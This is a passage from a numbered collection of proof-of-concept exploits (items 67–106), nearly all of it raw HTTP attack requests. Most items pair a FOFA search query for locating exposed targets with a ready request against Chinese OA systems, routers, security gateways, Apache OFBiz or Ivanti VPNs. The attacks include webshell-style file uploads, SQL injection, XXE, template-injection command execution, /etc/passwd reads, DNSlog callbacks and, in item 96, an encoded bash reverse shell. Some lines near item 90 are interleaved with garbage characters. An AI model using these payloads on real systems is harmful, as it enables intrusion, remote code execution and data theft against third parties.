Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability exists.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda Tianyao (速达天耀) software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is shown below; it injects a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+
+ B, l4 i' N8 q/ K7 O+ S

" t7 B8 p0 C+ i' X; C  ]90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
1 f* q  N8 w) t( m* xFOFA:icon_hash="-1830859634"
, Y5 N6 `" y2 p5 ^POST /php/ping.php HTTP/1.1
/ ], w2 ~5 v$ P- o$ `& I2 NHost: x.x.x.x
6 l' k( E& e3 B' y% B5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ Z- Q' Z* E5 e# m. W+ s
Content-Length: 51
; n" ]4 R0 G& e! ]4 n) _7 tAccept: application/json, text/javascript, */*; q=0.01
8 b  p" S( H  IAccept-Encoding: gzip, deflate1 w7 u0 Y6 ^+ f. L. Q" B) d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 J7 r7 E4 B5 ~/ m3 D3 UConnection: close
9 `) l9 O, k5 w- j5 ]$ v$ ]# bContent-Type: application/x-www-form-urlencoded2 C3 r# U' a5 U& n( `  z
X-Requested-With: XMLHttpRequest
6 z4 Y3 z4 ]* H: h0 ?; i# V' S' x
# i8 D7 ~+ v" c3 Ijsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig  z7 P! Q% U3 h  C' n, f

  d5 y4 t+ F& C) b& r9 f6 w; v, m4 Z5 J; D' G8 W# e
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QAX (奇安信) Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--



GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36



95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the XML document's content; the XML document is as follows
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
